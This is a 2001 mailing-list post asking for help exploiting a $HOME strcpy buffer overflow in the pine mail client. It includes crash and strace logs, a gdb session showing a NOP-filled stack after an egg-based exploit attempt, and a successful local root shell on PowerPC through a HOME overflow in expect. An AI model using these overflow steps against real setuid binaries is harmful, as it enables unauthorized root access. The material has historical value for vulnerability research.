Pine

From: Charles Stevenson (coreat_private)
Date: Wed Jul 11 2001 - 19:56:51 PDT


    Hi all,
    
    Has anyone ever coded a pine exploit?  I know it's vulnerable to a $HOME
    strcpy() problem.  And I have seen it installed suid this or that on several
    ISPs even though it shouldn't ever be!  What are the implications of this
    with pine itself -- can you simply run a command from within it?  I don't
    think pine was designed to be run suid and I'm not sure why anyone
    would give it such permissions. 
    
    [-(root@devastator:~/bleedingedge)> export HOME=`perl -e 'print "i" x
    6969'`           [-(:1-07-11-20:20:51)-]<p0>
    [-(root@devastator:/home/core/bleedingedge)>
    pine                                      [-(:1-07-11-20:21:10)-]<p0>
    zsh: segmentation fault  pine
    [-(root@devastator:/home/core/bleedingedge)> strace
    pine                               [-(:1-07-11-20:21:12)-]<p0>
    execve("/usr/bin/pine", ["pine"], [/* 20 vars */]) = 0
    mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
    0x40007000
    mprotect(0x40000000, 20353, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
    mprotect(0x8048000, 1352085, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
    stat("/etc/ld.so.cache", {st_mode=S_IFREG|0644, st_size=8183, ...}) = 0
    open("/etc/ld.so.cache", O_RDONLY)      = 3
    mmap(0, 8183, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000
    close(3)                                = 0
    stat("/etc/ld.so.preload", 0xbfffe180)  = -1 ENOENT (No such file or
    directory)
    open("/lib/libtermcap.so.2", O_RDONLY)  = 3
    read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
    mmap(0, 12288, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000a000
    mmap(0x4000a000, 7276, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0)
    = 0x4000a000
    mmap(0x4000c000, 3496, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
    0x1000) = 0x4000c000
    close(3)                                = 0
    mprotect(0x4000a000, 7276, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
    open("/lib/libc.so.5", O_RDONLY)        = 3
    read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
    mmap(0, 831488, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
    0x4000d000
    mmap(0x4000d000, 599154, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3,
    0) = 0x4000d000
    mmap(0x400a0000, 22664, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3,
    0x92000) = 0x400a0000
    mmap(0x400a6000, 200812, PROT_READ|PROT_WRITE,
    MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400a6000
    close(3)                                = 0
    mprotect(0x4000d000, 599154, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
    munmap(0x40008000, 8183)                = 0
    mprotect(0x8048000, 1352085, PROT_READ|PROT_EXEC) = 0
    mprotect(0x4000a000, 7276, PROT_READ|PROT_EXEC) = 0
    mprotect(0x4000d000, 599154, PROT_READ|PROT_EXEC) = 0
    mprotect(0x40000000, 20353, PROT_READ|PROT_EXEC) = 0
    personality(PER_LINUX)                  = 0
    geteuid()                               = 0
    getuid()                                = 0
    getgid()                                = 0
    getegid()                               = 11
    brk(0x81abb88)                          = 0x81abb88
    brk(0x81ac000)                          = 0x81ac000
    getpid()                                = 21010
    time(NULL)                              = 994904475
    getuid()                                = 0
    open("/etc/nsswitch.conf", O_RDONLY)    = 3
    brk(0x81af000)                          = 0x81af000
    fstat(3, {st_mode=S_IFREG|0644, st_size=1215, ...}) = 0
    mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
    0x40008000
    read(3, "#\n# /etc/nsswitch.conf\n#\n# An"..., 4096) = 1215
    read(3, "", 4096)                       = 0
    close(3)                                = 0
    munmap(0x40008000, 4096)                = 0
    open("/etc/passwd", O_RDONLY)           = 3
    fstat(3, {st_mode=S_IFREG|0644, st_size=28709, ...}) = 0
    mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
    0x40008000
    read(3, "root:x:0:0::/root:/bin/sh\ndaemo"..., 4096) = 4096
    lseek(3, -4070, SEEK_CUR)               = 26
    close(3)                                = 0
    munmap(0x40008000, 4096)                = 0
    brk(0x81b1000)                          = 0x81b1000
    ioctl(0, TCGETS, {B38400 opost isig icanon echo ...}) = 0
    --- SIGSEGV (Segmentation fault) ---
    +++ killed by SIGSEGV +++
    
    [-(root@devastator:~/bleedingedge/test)>
    ./exploit4                                   
    [-(:1-07-11-20:34:22)-]<p0>
    Using address: 0xbffffcc4
    [root@devastator ~/bleedingedge/test]# export HOME=$EGG
    [root@devastator /home/core/bleedingedge/test]# gdb pine
    GDB is free software and you are welcome to distribute copies of it
     under certain conditions; type "show copying" to see the conditions.
    There is absolutely no warranty for GDB; type "show warranty" for
    details.
    GDB 4.16 (i586-unknown-linux), Copyright 1996 Free Software Foundation,
    Inc...
    (gdb) r
    Starting program: /usr/bin/pine 
    zsh: path too long: .zshenv
    
    Program received signal SIGSEGV, Segmentation fault.
    0x4007a43f in strcpy ()
    (gdb) bt
    #0  0x4007a43f in strcpy ()
    #1  0x804a590 in _start ()
    #2  0x90909090 in ?? ()
    Cannot access memory at address 0x90909090.
    (gdb) frame 0
    #0  0x4007a43f in strcpy ()
    (gdb) list
    pine.c:252: No such file or directory.
    
    
    Also I'm not quite understanding coding overflows on x86. I can't seem to
    overwrite the eip, and my attempts on expect and pine both segfault.  Can
    someone tell me what I'm missing?  It's harder but easier on ppc arch.
    :)
    
    I mean it works so well on my iBook!
    
    [ Buffer size:  512             Egg size:       2048    Aligment:      
    0]
    [ Address:      0x100111f8      Offset:         0                       
    ]
    sh-2.05$ export HOME=$EGG
    sh-2.05$ expect
    sh-2.05# id
    uid=0(root) gid=1000(core)
    groups=1000(core),4(adm),24(cdrom),29(audio),30(dip)
    sh-2.05# 
    
    I don't feel like building pine for ppc but I'm sure it's just as
    simple.
    
    Thanks in advance for any x86 help.
    
    Best Regards,
    Charles Stevenson
    


